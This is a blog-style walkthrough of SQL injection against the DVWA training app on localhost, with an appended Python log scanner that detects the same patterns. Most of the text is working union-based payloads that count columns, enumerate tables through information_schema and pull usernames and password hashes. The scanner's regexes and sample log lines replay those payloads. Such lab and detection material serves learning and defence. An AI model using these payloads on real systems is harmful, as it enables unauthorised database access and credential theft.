SQL Injection Vulnerability

DVWA

SQL Injection

LOW

1. Entering a User ID displays the corresponding name, and the entered ID value appears in the URL bar.

2. Guess that the ID value is passed into a database query, and test whether an injection point exists.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1 and 1=2 &Submit=Submit#

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' &Submit=Submit#


http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' -- qwe &Submit=Submit#


An injection point exists, and the query is closed with a single quote.

3. Determine the number of columns with order by 5 (using binary search).

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 5 -- qwe &Submit=Submit#


http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 3 -- qwe &Submit=Submit#


http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 2 -- qwe &Submit=Submit#


The column count is 2.

4. Union-based injection: observe the display positions (echo points).

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=12313' union select 1,2 -- qwe &Submit=Submit#


5. Retrieve the current database version and the current database name.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=12313' union select version(),database() -- qwe &Submit=Submit#


6. Output all table names in the current database.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=12313' union select version(),group_concat(table_name) from information_schema.tables where table_schema=database() -- qwe &Submit=Submit#


7. Query all column names of the users table.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=12313' union select version(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- qwe &Submit=Submit#


8. Query the user and password columns of the users table.

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=12313' union select user,password from users limit 0,1 -- qwe &Submit=Submit#


http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=12313' union select user,password from users limit 3,1 -- qwe &Submit=Submit#


Medium

1. Selecting a different ID displays the corresponding name, and no parameter is passed in the URL.


2. Guess whether the parameter is sent via POST; capture the request for the current page.

The request carrying the parameter value 1 is captured.


Send the captured request to the Repeater module and resend it.


Change id to 4.


3. Determine whether an injection point exists.


Numeric injection.


4. Determine the column count with order by.


The column count is 2.


5. Use union injection to determine the echo points.


6. Determine the current database version.


7. Query all table names in the current database.


8. Query all column names of the users table.


A syntax error occurs; guess that the single quote is the problem. Since MySQL supports hexadecimal encoding and decoding by default, encode the string users as hexadecimal.


9. Query the user and password columns of the users table.


High

1. When the page is visited, the corresponding ID can only be changed through a link.


2. Click the link and pass the parameter.


3. Determine whether an injection point exists.


Closed with a single quote.


4. Determine the column count with order by.

1' order by 3 -- qwe


1' order by 2 -- qwe


5. Observe the display positions.

1' union select 1,2-- qwe


6. Output the current database version and the current database name.

123' union select version(),database()-- qwe


7. Query all table names in the current database.

123' union select version(),group_concat(table_name) from information_schema.tables where table_schema=database() -- qwe


8. Query all the columns of the users table.

123' union select version(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- qwe


9. Query the user and password columns of the users table.

123' union select user,password from users limit 0,1 -- qwe

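As an added example (not part of the original post), a small Python scanner that flags the injection patterns used in the three walkthroughs above when they show up in web-server access logs; the log lines, client IP and timestamps are constructed sample data that replay the Low-level URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Indicators distilled from the union-based walkthrough: quote-then-comment
# closing ("1' -- qwe"), tautology probes, ORDER BY column counting, UNION SELECT,
# information_schema enumeration and hex literals such as 0x7573657273 ('users').
INDICATORS = {
    "quote_then_comment": re.compile(r"'.*?(--(\s|$)|#)"),
    "tautology": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{6,}\b"),
}

# Apache/nginx "combined" access-log shape; only the request target is inspected.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def scan_request_target(target):
    """Return the names of the indicators that fire on one request target (path + query)."""
    query = urlsplit(target).query
    values = [v for vals in parse_qs(query, keep_blank_values=True).values() for v in vals]
    # parse_qs already decodes once; decoding again catches double-encoded payloads.
    decoded = unquote_plus(" ".join(values)).lower()
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]

def scan_log(lines):
    """Return (client ip, method, indicator names) for every suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        hits = scan_request_target(m.group("target"))
        if hits:
            findings.append((m.group("ip"), m.group("method"), hits))
    return findings

# Constructed sample log lines. The Medium level sends id in a POST body, which an
# access log never records, so catching those needs request-body logging (WAF or app log).
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Oct/2022:09:45:00 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4412',
    '10.0.0.5 - - [27/Oct/2022:09:46:38 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1+and+1=2+&Submit=Submit HTTP/1.1" 200 4380',
    '10.0.0.5 - - [27/Oct/2022:09:47:55 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1%27+order+by+5+--+qwe+&Submit=Submit HTTP/1.1" 200 4391',
    '10.0.0.5 - - [27/Oct/2022:09:54:15 +0800] "GET /dvwa/vulnerabilities/sqli/?id=12313%27+union+select+version(),group_concat(table_name)+from+information_schema.tables+where+table_schema=database()+--+qwe+&Submit=Submit HTTP/1.1" 200 4455',
    '10.0.0.5 - - [27/Oct/2022:10:17:02 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1%27+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x7573657273+--+qwe HTTP/1.1" 200 4460',
]
```

Running scan_log(SAMPLE_LOG) skips the benign first line and reports the other four, with the last one also tripping hex_literal because 0x7573657273 is the hex form of users that the Medium level needed.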

posted @ 2025-07-16 12:31 长温不喜风云